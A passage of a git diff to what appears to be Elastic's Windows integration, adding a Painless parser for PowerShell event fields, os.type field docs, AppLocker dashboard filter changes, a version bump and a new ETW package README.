'')\n\t\t\t\t\t\t}\n\t\t\t\t\t\tprocess {\n\t\t\t\t\t\t\ttry {\n\t\t\t\t\t\t\t\t$Groups = @(\n\t\t\t\t\t\t\t\t\t$Guid.Substring(0, 8).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(8, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(12, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(16, 16).ToCharArray()\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t$Groups[0..2] | foreach {\n\t\t\t\t\t\t\t\t\t[array]::Reverse($_)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid = ($Groups[0..2] | foreach { $_ -join '' }) -join ''\n\n\t\t\t\t\t\t\t\t$chararr = $Groups[3]\n\t\t\t\t\t\t\t\tfor ($i = 0; $i -lt $chararr.count; $i++) {\n\t\t\t\t\t\t\t\t\tif (($i % 2) -eq 0) {\n\t\t\t\t\t\t\t\t\t\t$CompressedGuid += ($chararr[$i+1] + $chararr[$i]) -join ''\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid\n\t\t\t\t\t\t\t} catch {\n\t\t\t\t\t\t\t\tWrite-Error $_.Exception.Message\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n function Clean-Quotes-Backslash {\n param ([string]$str)\n if($str.length -ge 2 -and $str.Substring(0,1) -eq '\"' -and $str.Substring($str.length - 1) -eq '\"'){\n $str = $str.Substring(1, $str.length - 2)\n }\n $str = $str.Replace('\\', '\\\\')\n $str = $str.Replace('\"', '\\\"')\n return $str\n }\n\t\t\t\t $products = Get-ItemProperty HKLM:\\Software\\Classes\\Installer\\Products\\* | Select-Object @{n=\"PSChildName\";e={$_.\"PSChildName\"}} |\n\t\t\t\t Select -expand PSChildName\n\n\t\t\t\t \n[Console]::OutputEncoding = [System.Text.Encoding]::UTF8\nGet-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |\nWhere-Object {($_.DisplayName -ne $null -and $_DisplayName -ne '' -and $_.DisplayName -notmatch '^KB[000000-999999]') -and\n\t($_.SystemComponent -eq $null -or ($_.SystemComponent -ne $null -and $_.SystemComponent -eq '0')) -and\n\t($_.ParentKeyName -eq $null) -and\n\t($_.WindowsInstaller -eq $null -or ($_.WindowsInstaller -eq '0') -or ($_.WindowsInstaller -eq 1 -and $products -contains (Convert-GuidToCompressedGuid $_.PSChildName))) -and\n\t($_.ReleaseType -eq $null -or ($_.ReleaseType -ne $null -and\n\t\t$_.ReleaseType -ne 'Security Update' -and\n\t\t$_.ReleaseType -ne 'Update Rollup' -and\n\t\t$_.ReleaseType -ne 'Hotfix'))\n} |\nSelect-Object @{n=\"Name\";e={$_.\"DisplayName\"}},\n\t@{n=\"PackageId\";e={$_.\"PSChildName\"}}, @{n=\"Version\";e={$_.\"DisplayVersion\"}}, Publisher,\n\t@{n=\"InstalledTime\";e={[datetime]::ParseExact($_.\"InstallDate\",\"yyyyMMdd\",$null).ToUniversalTime().ToString(\"yyyy-MM-ddTHH:mm:ssZ\")}} | % { [Console]::WriteLine(@\"\n{\"Name\":\"$(Clean-Quotes-Backslash $_.Name)\",\"PackageId\":\"$($_.PackageId)\",\"Version\":\"$(Clean-Quotes-Backslash $_.Version)\",\"Publisher\":\"$(Clean-Quotes-Backslash $_.Publisher)\",\"InstalledTime\":\"$($_.InstalledTime)\"},\n\"@)}", + "entity_id": "00654153-46ad-42bf-ad06-3bfce5c65b55", + "title": "ConsoleHost" + }, + "winlog": { + "api": "wineventlog", + "channel": "Windows PowerShell", + "computer_name": "foo", + "event_id": "600", + "keywords": [ + "Classic" + ], + "opcode": "Info", + "provider_name": "PowerShell", + "record_id": "67086", + "task": "Provider Lifecycle" + } } ] } \ No newline at end of file diff --git a/packages/windows/data_stream/powershell/elasticsearch/ingest_pipeline/default.yml b/packages/windows/data_stream/powershell/elasticsearch/ingest_pipeline/default.yml index e9afc6de1e5..9c88c7b8b13 100644 --- a/packages/windows/data_stream/powershell/elasticsearch/ingest_pipeline/default.yml +++ b/packages/windows/data_stream/powershell/elasticsearch/ingest_pipeline/default.yml @@ -10,15 +10,37 @@ processors: trim_value: "\n\t" value_split: "=" if: ctx?.winlog?.event_id == "800" - - kv: - description: Split Events 4xx and 600 event data fields. - field: winlog.event_data.param3 - target_field: winlog.event_data - field_split: "\n\t" - trim_key: "\n\t" - trim_value: "\n\t" - value_split: "=" - if: ctx?.winlog?.event_id != "800" + - script: + description: |- + Split Events 4xx and 600 event data fields. + Some events can contain multiline values containing also '\n', '\s', and '=' characters, + for this reason a simple KV processor is not reliable enough and we need a more specific parsing. + lang: painless + if: ctx.winlog?.event_id != "800" && ctx.winlog?.event_data?.param3 != null + params: + field: param3 + source: |- + def p = ctx.winlog?.event_data[params["field"]]; + // Define the pattern that will match all keys + def pat = /(^|(^[\n]?))?\t([^\s\W]+)=/m; + def m = pat.matcher(p); + + // we position ourselves in the first matching key + m.find(); + def key = m.group(3).trim(); + def previousEnd = m.end(); + + // while new keys are found, we add everything between one key and the next + // as the value, regardless of its contents + while(m.find()) + { + ctx.winlog.event_data[key] = p.substring(previousEnd, m.start()).trim(); + previousEnd = m.end(); + key = m.group(3).trim(); + } + + // add remaining value + ctx.winlog.event_data[key] = p.substring(previousEnd).trim(); ## ECS and Event fields. diff --git a/packages/windows/data_stream/powershell/fields/agent.yml b/packages/windows/data_stream/powershell/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/powershell/fields/agent.yml +++ b/packages/windows/data_stream/powershell/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/powershell/manifest.yml b/packages/windows/data_stream/powershell/manifest.yml index c17b2d9ca27..d6336f08dea 100644 --- a/packages/windows/data_stream/powershell/manifest.yml +++ b/packages/windows/data_stream/powershell/manifest.yml @@ -60,6 +60,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -70,7 +71,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows Powershell Events via Splunk Enterprise REST API description: Collect Powershell Events via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/powershell_operational/fields/agent.yml b/packages/windows/data_stream/powershell_operational/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/powershell_operational/fields/agent.yml +++ b/packages/windows/data_stream/powershell_operational/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/powershell_operational/manifest.yml b/packages/windows/data_stream/powershell_operational/manifest.yml index 5800753a50f..21b4bc93f6c 100644 --- a/packages/windows/data_stream/powershell_operational/manifest.yml +++ b/packages/windows/data_stream/powershell_operational/manifest.yml @@ -60,6 +60,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -70,7 +71,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows Powershell Operational Events via Splunk Enterprise REST API description: Collect Powershell Operational Events via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/service/fields/agent.yml b/packages/windows/data_stream/service/fields/agent.yml index 0aca68da6ed..559419f0483 100644 --- a/packages/windows/data_stream/service/fields/agent.yml +++ b/packages/windows/data_stream/service/fields/agent.yml @@ -63,6 +63,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/sysmon_operational/fields/agent.yml b/packages/windows/data_stream/sysmon_operational/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/sysmon_operational/fields/agent.yml +++ b/packages/windows/data_stream/sysmon_operational/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/sysmon_operational/manifest.yml b/packages/windows/data_stream/sysmon_operational/manifest.yml index a7f85831a81..a92ec651a46 100644 --- a/packages/windows/data_stream/sysmon_operational/manifest.yml +++ b/packages/windows/data_stream/sysmon_operational/manifest.yml @@ -51,6 +51,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -61,7 +62,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows Sysmon Operational Events via Splunk Enterprise REST API description: Collect Sysmon Operational Events via Splunk Enterprise REST API diff --git a/packages/windows/docs/README.md b/packages/windows/docs/README.md index 649b37d62fc..426ea19070d 100644 --- a/packages/windows/docs/README.md +++ b/packages/windows/docs/README.md @@ -274,6 +274,7 @@ An example event for `applocker_exe_and_dll` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | @@ -653,6 +654,7 @@ An example event for `applocker_msi_and_script` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | @@ -1025,6 +1027,7 @@ An example event for `applocker_packaged_app_deployment` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | @@ -1398,6 +1401,7 @@ An example event for `applocker_packaged_app_execution` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | @@ -1746,6 +1750,7 @@ An example event for `powershell` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | @@ -2082,6 +2087,7 @@ An example event for `powershell_operational` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | @@ -2505,6 +2511,7 @@ An example event for `sysmon_operational` looks as following: | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Type of Filebeat input. | keyword | @@ -2778,6 +2785,7 @@ The Windows `service` data stream provides service details. | host.os.name | Operating system name, without the version. | keyword | | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | | host.os.version | Operating system version as a raw string. | keyword | | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | | windows.service.display_name | The display name of the service. | keyword | | @@ -2834,6 +2842,7 @@ The Windows `perfmon` data stream provides performance counter values. | host.os.name | Operating system name, without the version. | keyword | | host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. One of these following values should be used (lowercase): linux, macos, unix, windows. If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | windows.perfmon.instance | Instance value. | keyword | diff --git a/packages/windows/kibana/dashboard/windows-b28aaad0-2f2d-11ee-acdc-45d0efa0889d.json b/packages/windows/kibana/dashboard/windows-b28aaad0-2f2d-11ee-acdc-45d0efa0889d.json index 5559f5b7dcd..1246bbcfe64 100644 --- a/packages/windows/kibana/dashboard/windows-b28aaad0-2f2d-11ee-acdc-45d0efa0889d.json +++ b/packages/windows/kibana/dashboard/windows-b28aaad0-2f2d-11ee-acdc-45d0efa0889d.json @@ -11,63 +11,114 @@ "meta": { "alias": "Audited Applications", "disabled": true, - "field": "event.code", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", "negate": false, "params": [ - "8003", - "8006", - "8021", - "8022", - "8023", - "8024", - "8027" - ], - "type": "phrases" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "8003" - } - }, - { - "match_phrase": { - "event.code": "8006" - } - }, - { - "match_phrase": { - "event.code": "8021" - } - }, - { - "match_phrase": { - "event.code": "8022" - } - }, - { - "match_phrase": { - "event.code": "8023" - } + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.code", + "index": "logs-*", + "key": "event.code", + "negate": false, + "params": [ + "8003", + "8006", + "8021", + "8022", + "8023", + "8024", + "8027" + ], + "type": "phrases", + "value": [ + "8003", + "8006", + "8021", + "8022", + "8023", + "8024", + "8027" + ] }, - { - "match_phrase": { - "event.code": "8024" + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.code": "8003" + } + }, + { + "match_phrase": { + "event.code": "8006" + } + }, + { + "match_phrase": { + "event.code": "8021" + } + }, + { + "match_phrase": { + "event.code": "8022" + } + }, + { + "match_phrase": { + "event.code": "8023" + } + }, + { + "match_phrase": { + "event.code": "8024" + } + }, + { + "match_phrase": { + "event.code": "8027" + } + } + ] } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.provider", + "index": "logs-*", + "key": "event.provider", + "negate": false, + "params": [ + "Microsoft-Windows-AppLocker" + ], + "type": "phrases", + "value": [ + "Microsoft-Windows-AppLocker" + ] }, - { - "match_phrase": { - "event.code": "8027" + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.provider": "Microsoft-Windows-AppLocker" + } + } + ] } } - ] - } - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} }, { "$state": { @@ -76,33 +127,79 @@ "meta": { "alias": "Blocked Applications", "disabled": true, - "field": "event.code", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "key": "event.code", "negate": false, "params": [ - "8004", - "8007" - ], - "type": "phrases" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "8004" + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.code", + "index": "logs-*", + "key": "event.code", + "negate": false, + "params": [ + "8004", + "8007" + ], + "type": "phrases", + "value": [ + "8004", + "8007" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.code": "8004" + } + }, + { + "match_phrase": { + "event.code": "8007" + } + } + ] } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.provider", + "index": "logs-*", + "key": "event.provider", + "negate": false, + "params": [ + "Microsoft-Windows-AppLocker" + ], + "type": "phrases", + "value": [ + "Microsoft-Windows-AppLocker" + ] }, - { - "match_phrase": { - "event.code": "8007" + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.provider": "Microsoft-Windows-AppLocker" + } + } + ] } } - ] - } - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} }, { "$state": { @@ -111,57 +208,107 @@ "meta": { "alias": "Allowed Applications", "disabled": true, - "field": "event.code", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", - "key": "event.code", "negate": false, "params": [ - "8002", - "8005", - "8020", - "8027", - "8037", - "8039" - ], - "type": "phrases" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "8002" - } - }, - { - "match_phrase": { - "event.code": "8005" - } - }, - { - "match_phrase": { - "event.code": "8020" - } - }, - { - "match_phrase": { - "event.code": "8027" - } + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.code", + "index": "logs-*", + "key": "event.code", + "negate": false, + "params": [ + "8002", + "8005", + "8020", + "8027", + "8037", + "8039" + ], + "type": "phrases", + "value": [ + "8002", + "8005", + "8020", + "8027", + "8037", + "8039" + ] }, - { - "match_phrase": { - "event.code": "8037" + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.code": "8002" + } + }, + { + "match_phrase": { + "event.code": "8005" + } + }, + { + "match_phrase": { + "event.code": "8020" + } + }, + { + "match_phrase": { + "event.code": "8027" + } + }, + { + "match_phrase": { + "event.code": "8037" + } + }, + { + "match_phrase": { + "event.code": "8039" + } + } + ] } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.provider", + "index": "logs-*", + "key": "event.provider", + "negate": false, + "params": [ + "Microsoft-Windows-AppLocker" + ], + "type": "phrases", + "value": [ + "Microsoft-Windows-AppLocker" + ] }, - { - "match_phrase": { - "event.code": "8039" + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.provider": "Microsoft-Windows-AppLocker" + } + } + ] } } - ] - } - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} } ], "query": { @@ -224,7 +371,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "layerId": "1ba1f39a-5a90-4ab5-ad2d-a8a4762395e7", @@ -338,7 +485,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "color": "#54B399", @@ -505,7 +652,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and winlog.user_data.Fqbn : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and winlog.user_data.Fqbn : \"-\"" }, "visualization": { "color": "#DA8B45", @@ -593,7 +740,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\") and winlog.user_data.Fqbn : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\") and winlog.user_data.Fqbn : \"-\"" }, "visualization": { "color": "#E7664C", @@ -680,7 +827,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\") and not winlog.user_data.Fqbn : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\") and not winlog.user_data.Fqbn : \"-\"" }, "visualization": { "color": "#E57D68", @@ -767,7 +914,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name: \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") and winlog.user_data.Fqbn : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") and winlog.user_data.Fqbn : \"-\"" }, "visualization": { "color": "#DA8B45", @@ -854,7 +1001,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") and not winlog.user_data.Fqbn : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") and not winlog.user_data.Fqbn : \"-\"" }, "visualization": { "color": "#D6BF57", @@ -953,7 +1100,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" " + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "layers": [ @@ -1056,7 +1203,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\")" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\")" }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1184,7 +1331,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") " + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") " }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1338,7 +1485,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\")" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8004\" or \"8007\")" }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1496,7 +1643,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") " + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and event.code: (\"8003\" or \"8006\" or \"8021\" or \"8022\" or \"8023\" or \"8024\" or \"8027\") " }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1638,7 +1785,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" and not winlog.user_data.RuleName : \"-\"" + "query": "event.provider : \"Microsoft-Windows-AppLocker\" and not winlog.user_data.RuleName : \"-\"" }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1791,7 +1938,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" " + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1943,7 +2090,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" " + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "axisTitlesVisibilitySettings": { @@ -2081,7 +2228,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "layers": [ @@ -2199,7 +2346,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "layers": [ @@ -2318,7 +2465,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "columns": [ @@ -2461,7 +2608,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "emsField": "iso2", diff --git a/packages/windows/manifest.yml b/packages/windows/manifest.yml index 70f30f70946..3c7ca7072f3 100644 --- a/packages/windows/manifest.yml +++ b/packages/windows/manifest.yml @@ -1,6 +1,6 @@ name: windows title: Windows -version: 1.44.1 +version: 1.44.5 description: Collect logs and metrics from Windows OS and services with Elastic Agent. type: integration categories: diff --git a/packages/windows_etw/_dev/build/build.yml b/packages/windows_etw/_dev/build/build.yml new file mode 100644 index 00000000000..71f48ba2a9c --- /dev/null +++ b/packages/windows_etw/_dev/build/build.yml @@ -0,0 +1,4 @@ +dependencies: + ecs: + reference: "git@v8.11.0" + import_mappings: true diff --git a/packages/windows_etw/_dev/build/docs/README.md b/packages/windows_etw/_dev/build/docs/README.md new file mode 100644 index 00000000000..536f7cc43da --- /dev/null +++ b/packages/windows_etw/_dev/build/docs/README.md @@ -0,0 +1,27 @@ +# Custom Windows ETW package + +The custom Windows ETW ([Event Tracing for Windows](https://learn.microsoft.com/en-us/windows/win32/etw/event-tracing-portal)) package allows you to ingest events from any ETW provider available. Providers can be listed by running [`logman query providers`](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/logman-query) in any Windows command-line interface. + +This integration currently supports manifest-based, user-mode MOF (classic) and TraceLogging providers while WPP providers are not supported. [`Here`](https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing#types-of-providers) you can find more information about the available types of providers. + +It is supported in every Windows versions supported by [`Filebeat`](https://www.elastic.co/support/matrix), starting from Windows 10 and Windows Server 2016. + +This package does not contain any ingest pipeline, so no pre-ingest data processing is applied out of the box. Custom ingest pipelines can be added through the Kibana UI to get the data in the desired format. + +## Configuration + +This integration can interact with ETW in three distinct ways: it can create a new session to capture events from user-mode providers, attach to an already existing session to collect ongoing event data, or read events from a pre-recorded .etl file. For that reason, when configuring the integration there are three parameters that are mutually exclusive, but at least one of them must be set: Provider (Name or GUID), File and Session. + +Event trace level may be specified at `critical`, `error`, `warning`, `information`, or `verbose`. The system will ingest events that correspond to the specified trace level or exceed it in terms of severity. + +Events may be filtered using event masks with the `Match Any Keyword` or `Match All Keyword` parameters. The `Match Any Keyword` parameter specifies a 64-bit bitmask where an event is ingested if any of the bits set in this bitmask match any of the keyword bits set in the event's properties, allowing for a broad selection of events based on multiple criteria. Conversely, the `Match All Keyword` parameter requires that all bits set in its 64-bit bitmask match the event's keyword bits for the event to be ingested.The correct format for both fields is `0x` followed by a 16-character hexadecimal number. + 